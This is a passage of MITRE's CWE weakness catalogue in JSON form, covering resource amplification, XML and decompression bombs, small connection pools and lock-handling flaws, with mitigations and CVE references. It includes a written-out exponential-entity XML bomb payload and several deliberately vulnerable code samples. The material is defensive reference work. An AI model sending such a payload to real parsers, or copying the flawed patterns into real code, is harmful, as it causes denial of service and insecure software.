Complexity"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-395"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Functional_Areas, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Algorithmic Complexity","attr":{"@_Date":"2019-06-20"}}}},"408":{"attr":{"@_ID":"408","@_Name":"Incorrect Behavior Order: Early Amplification","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software allows an entity to perform a legitimate but expensive operation before authentication or authorization has taken place.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"System resources, CPU and memory, can be quickly consumed. This can lead to poor system performance or system crash."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This data prints the contents of a specified file requested by a user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function printFile($username,$filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$file = file_get_contents($filename);if ($file &amp;&amp; isOwnerOf($username,$filename)){}else{}return false;","xhtml:br":["","","","",""],"xhtml:i":"//read file into string","xhtml:div":[{"#text":"echo $file;return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'You are not authorized to view this file\';","attr":{"@_style":"margin-left:10px;"}}]}}}},"Body_Text":"This code first reads a specified file into memory, then prints the file if the user is authorized to see its contents. The read of the file into memory may be resource intensive and is unnecessary if the user is not allowed to see the file anyway."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-2458","Description":"Tool creates directories before authenticating user.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2458"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Early Amplification"}},"Notes":{"Note":{"#text":"Overlaps authentication errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Early Amplification","attr":{"@_Date":"2008-04-11"}}}},"409":{"attr":{"@_ID":"409","@_Name":"Improper Handling of Highly Compressed Data (Data Amplification)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output.","Extended_Description":"An example of data amplification is a \\"decompression bomb,\\" a small ZIP file that can produce a large amount of data when it is decompressed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"System resources, CPU and memory, can be quickly consumed. This can lead to poor system performance or system crash."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-53"},"Intro_Text":"The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected.","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"XML"},"xhtml:div":{"#text":"&lt;?xml version=\\"1.0\\"?&gt;&lt;!DOCTYPE MaliciousDTD [&lt;!ENTITY ZERO \\"A\\"&gt;&lt;!ENTITY ONE \\"&amp;ZERO;&amp;ZERO;\\"&gt;&lt;!ENTITY TWO \\"&amp;ONE;&amp;ONE;\\"&gt;...&lt;!ENTITY THIRTYTWO \\"&amp;THIRTYONE;&amp;THIRTYONE;\\"&gt;]&gt;&lt;data&gt;&amp;THIRTYTWO;&lt;/data&gt;","xhtml:br":["","","","","","","",""]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1955","Description":"XML bomb in web server module","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955"},{"Reference":"CVE-2003-1564","Description":"Parsing library allows XML bomb","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1564"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Data Amplification"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS04-J","Entry_Name":"Limit the size of files passed to ZipInputStream"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Data Amplification","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Highly Compressed Data (Data Amplification)","attr":{"@_Date":"2009-05-27"}}]}},"410":{"attr":{"@_ID":"410","@_Name":"Insufficient Resource Pool","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software\'s resource pool is not large enough to handle peak demand, which allows an attacker to prevent others from accessing the resource by using a (relatively) large number of requests for resources.","Extended_Description":"Frequently the consequence is a \\"flood\\" of connection or sessions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"400","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Other"],"Impact":["DoS: Crash, Exit, or Restart","Other"],"Note":"Floods often cause a crash or other problem besides denial of the resource itself; these are likely examples of *other* vulnerabilities, not an insufficient resource pool."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not perform resource-intensive transactions for unauthenticated users and/or invalid requests."},{"Phase":"Architecture and Design","Description":"Consider implementing a velocity check mechanism which would detect abusive behavior."},{"Phase":"Operation","Description":"Consider load balancing as an option to handle heavy loads."},{"Phase":"Implementation","Description":"Make sure that resource handles are properly closed when no longer needed."},{"Phase":"Architecture and Design","Description":"Identify the system\'s resource intensive operations and consider protecting them from abuse (e.g. malicious automated script which runs the resources out)."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following snippet from a Tomcat configuration file, a JDBC connection pool is defined with a maximum of 5 simultaneous connections (with a 60 second timeout). In this case, it may be trivial for an attacker to instigate a denial of service (DoS) by using up all of the available connections in the pool.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;Resource name=\\"jdbc/exampledb\\"auth=\\"Container\\"type=\\"javax.sql.DataSource\\"removeAbandoned=\\"true\\"removeAbandonedTimeout=\\"30\\"maxActive=\\"5\\"maxIdle=\\"5\\"maxWait=\\"60000\\"username=\\"testuser\\"password=\\"testpass\\"driverClassName=\\"com.mysql.jdbc.Driver\\"url=\\"jdbc:mysql://localhost/exampledb\\"/&gt;","xhtml:br":["","","","","","","","","","",""]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1363","Description":"Large number of locks on file exhausts the pool and causes crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1363"},{"Reference":"CVE-2001-1340","Description":"Product supports only one connection and does not disconnect a user who does not provide credentials.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1340"},{"Reference":"CVE-2002-0406","Description":"Large number of connections without providing credentials allows connection exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0406"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Resource Pool"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"TPS00-J","Entry_Name":"Use thread pools to enable graceful degradation of service during traffic bursts"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 17, &#34;Protecting Against Denial of Service Attacks&#34; Page 517"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"412":{"attr":{"@_ID":"412","@_Name":"Unrestricted Externally Accessible Lock","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software properly checks for the existence of a lock, but the lock can be externally controlled or influenced by an actor that is outside of the intended sphere of control.","Extended_Description":"This prevents the software from acting on associated resources or performing other behaviors that are controlled by the presence of the lock. Relevant locks might include an exclusive lock or mutex, or modifying a shared resource that is treated as a lock. If the lock can be held for an indefinite period of time, then the denial of service could be permanent.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"410","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"When an attacker can control a lock, the program may wait indefinitely until the attacker releases the lock, causing a denial of service to other users of the program. This is especially problematic if there is a blocking operation on the lock."}},"Detection_Methods":{"Detection_Method":{"Method":"White Box","Description":"Automated code analysis techniques might not be able to reliably detect this weakness, since the application\'s behavior and general security model dictate which resource locks are critical. Interpretation of the weakness might require knowledge of the environment, e.g. if the existence of a file is used as a lock, but the file is created in a world-writable directory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"Use any access control that is offered by the functionality that is offering the lock."},{"Phase":["Architecture and Design","Implementation"],"Description":"Use unpredictable names or identifiers for the locks. This might not always be possible or feasible."},{"Phase":"Architecture and Design","Description":"Consider modifying your code to use non-blocking synchronization methods."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-69"},"Intro_Text":"This code tries to obtain a lock for a file, then writes to it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function writeToLog($message){}fclose($logFile);","xhtml:div":{"#text":"$logfile = fopen(\\"logFile.log\\", \\"a\\");if (flock($logfile, LOCK_EX)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//attempt to get logfile lock","xhtml:div":[{"#text":"fwrite($logfile,$message);flock($logfile, LOCK_UN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"// unlock logfile"},{"#text":"print \\"Could not obtain lock on logFile.log, message not recorded\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]},"xhtml:br":""}},"Body_Text":"PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock()."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0682","Description":"Program can not execute when attacker obtains a mutex.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0682"},{"Reference":"CVE-2002-1914","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1914"},{"Reference":"CVE-2002-1915","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1915"},{"Reference":"CVE-2002-0051","Description":"Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0051"},{"Reference":"CVE-2000-0338","Description":"Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0338"},{"Reference":"CVE-2000-1198","Description":"Chain: Lock files with predictable names. Resultant from randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1198"},{"Reference":"CVE-2002-1869","Description":"Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1869"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unrestricted Critical Resource Lock"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Deadlock"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK00-J","Entry_Name":"Use private final lock objects to synchronize classes that may interact with untrusted code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK07-J","Entry_Name":"Avoid deadlock by requesting and releasing locks in the same order"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP22","Entry_Name":"Unrestricted lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"Notes":{"Note":{"#text":"This overlaps Insufficient Resource Pool when the \\"pool\\" is of size 1. It can also be resultant from race conditions, although the timing window could be quite large in some cases.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Detection_Factors, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Importance":"Critical","Modification_Comment":"Suggested a better name and the minimal relationship with resources regardless of their criticality."},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Added a White_Box_Definition and clarified the consequences."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Organization":"KDM Analytics","Contribution_Date":"2008-08-29","Contribution_Comment":"suggested clarification of description and observed examples, which were vague and inconsistent."},"Previous_Entry_Name":[{"#text":"Unrestricted Critical Resource Lock","attr":{"@_Date":"2008-04-11"}},{"#text":"Unrestricted Lock on Critical Resource","attr":{"@_Date":"2009-07-27"}}]}},"413":{"attr":{"@_ID":"413","@_Name":"Improper Resource Locking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not lock or does not correctly lock a resource when the software must have exclusive access to the resource.","Extended_Description":"When a resource is not properly locked, an attacker could modify the resource while it is being operated on by the software. This might violate the software\'s assumption that the resource will not change, potentially leading to unexpected behaviors.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Modify Application Data","DoS: Instability","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a non-conflicting privilege scheme."},{"Phase":["Architecture and Design","Implementation"],"Description":"Use synchronization when locking a resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]},{"Intro_Text":"This Java example shows a simple BankAccount class with deposit and withdraw methods.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private double accountBalance;public BankAccount() {}public void deposit(double depositAmount) {}public void withdraw(double withdrawAmount) {}...","xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["// variable for bank account balance","// constructor for BankAccount","// method to deposit amount into BankAccount","// method to withdraw amount from BankAccount","// other methods for accessing the BankAccount object"],"xhtml:div":[{"#text":"accountBalance = 0;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = accountBalance + depositAmount;accountBalance = newBalance;","xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = accountBalance - withdrawAmount;accountBalance = newBalance;","xhtml:br":["",""]}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...public synchronized void deposit(double depositAmount) {}public synchronized void withdraw(double withdrawAmount) {}...","xhtml:br":["","","","","","",""],"xhtml:i":["// synchronized method to deposit amount into BankAccount","// synchronized method to withdraw amount from BankAccount"],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...private ReentrantLock balanceChangeLock;private Condition sufficientFundsCondition;public void deposit(double amount) {}public void withdraw(double amount) {}...","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// lock object for thread access to methods","// condition object to temporarily release lock to other threads","// method to deposit amount into BankAccount","// method to withdraw amount from bank account"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"balanceChangeLock.lock();try {} catch (Exception e) {...}finally {}","xhtml:br":["","","",""],"xhtml:i":"// set lock to block access to BankAccount from other 